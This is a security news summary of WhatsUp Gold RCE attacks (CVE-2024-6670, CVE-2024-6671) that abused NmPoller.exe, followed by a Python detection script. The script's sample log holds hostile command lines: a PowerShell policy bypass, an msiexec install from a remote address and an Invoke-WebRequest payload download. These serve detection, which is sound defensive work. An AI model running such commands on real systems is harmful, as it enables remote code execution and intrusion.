news-13092024-232316

Trend Micro researchers recently discovered remote code execution (RCE) attacks on WhatsUp Gold that exploited the Active Monitor PowerShell Script. These attacks targeted vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. However, despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the publication of a proof of concept on August 30.

The attacks involved the abuse of NmPoller.exe to execute PowerShell scripts, download remote access tools, and attempt to gain persistence. To mitigate these attacks, organizations are advised to restrict access to corporate services, apply patches immediately, and closely monitor suspicious process creation events in WhatsUp Gold environments.

The vulnerability discovery and exploit attempt timeline revealed that the PoC was published on GitHub just a few hours after the patch release, leading to exploit attempts on the same day. This highlights the importance of applying patches promptly, even before a PoC becomes available.

In addition to patch management, organizations should implement access control measures, multi-factor authentication (MFA), and strong password practices to enhance security. Monitoring for suspicious activities, such as MSI package installations from external sources and remote access tool (RAT) installations, is also crucial in detecting and preventing similar attacks.
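The two monitoring recommendations above (watching for NmPoller.exe spawning script interpreters, and for MSI packages pulled from external sources) can be expressed as a small detection rule over process-creation telemetry. The script below is an added example, not Trend Micro's code or part of the WhatsUp Gold product; it assumes a simple `key=value|key=value` log format with Sysmon-style field names (ParentImage, Image, CommandLine), and the sample records and the 198.51.100.23 address are constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (field names modelled on Sysmon Event ID 1; assumption)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not a capture from a real host). Line 1 and 5 show
# NmPoller.exe launching PowerShell, line 3 shows msiexec fetching a remote package,
# lines 2 and 4 are benign control cases.
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\temp\\task.ps1",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe|CommandLine=NmPoller.exe",
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|Image=C:\\Windows\\System32\\msiexec.exe|CommandLine=msiexec.exe /i http://198.51.100.23/agent.msi /qn",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\msiexec.exe|CommandLine=msiexec.exe /i C:\\Users\\admin\\Downloads\\7zip.msi",
    "ParentImage=C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -Command Invoke-WebRequest -Uri http://198.51.100.23/agent.exe -OutFile C:\\temp\\agent.exe",
]

# Interpreters that NmPoller.exe has no legitimate reason to spawn directly in normal operation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Any remote URL scheme on a command line; used for both msiexec and script-host downloads.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line: str) -> ProcessEvent:
    """Parse one key=value|key=value record into a ProcessEvent."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the detection tags that apply to a single process-creation event."""
    findings = []
    parent, child = basename(event.parent_image), basename(event.image)
    if parent == "nmpoller.exe" and child in SCRIPT_HOSTS:
        findings.append("nmpoller-spawned-script-host")
    if child in SCRIPT_HOSTS and REMOTE_URL.search(event.command_line):
        findings.append("script-host-remote-download")
    if child == "msiexec.exe" and REMOTE_URL.search(event.command_line):
        findings.append("msiexec-remote-package")
    return findings


def scan(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Scan log lines and return (line number, process name, tags) for every hit."""
    alerts = []
    for number, line in enumerate(lines, 1):
        event = parse_line(line)
        tags = classify(event)
        if tags:
            alerts.append((number, basename(event.image), tags))
    return alerts


if __name__ == "__main__":
    for number, process, tags in scan(SAMPLE_LOG):
        print(f"line {number}: {process} -> {', '.join(tags)}")
```

In a real deployment the same `classify` logic would run over Sysmon Event ID 1 or EDR process-creation events rather than the constructed strings here; the parent/child pairing is the high-signal part, since a monitoring poller launching an interpreter is unusual regardless of what the script does.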

Maintaining day-to-day readiness and vigilance against cyberattacks is essential for effective incident response. Organizations can also consider deploying security technologies like Trend Vision One™ for multilayered protection and behavior detection.

By following best practices and implementing robust security measures, organizations can strengthen their defenses against RCE attacks and other cybersecurity threats. Stay informed, stay vigilant, and prioritize cybersecurity to safeguard your digital assets and infrastructure.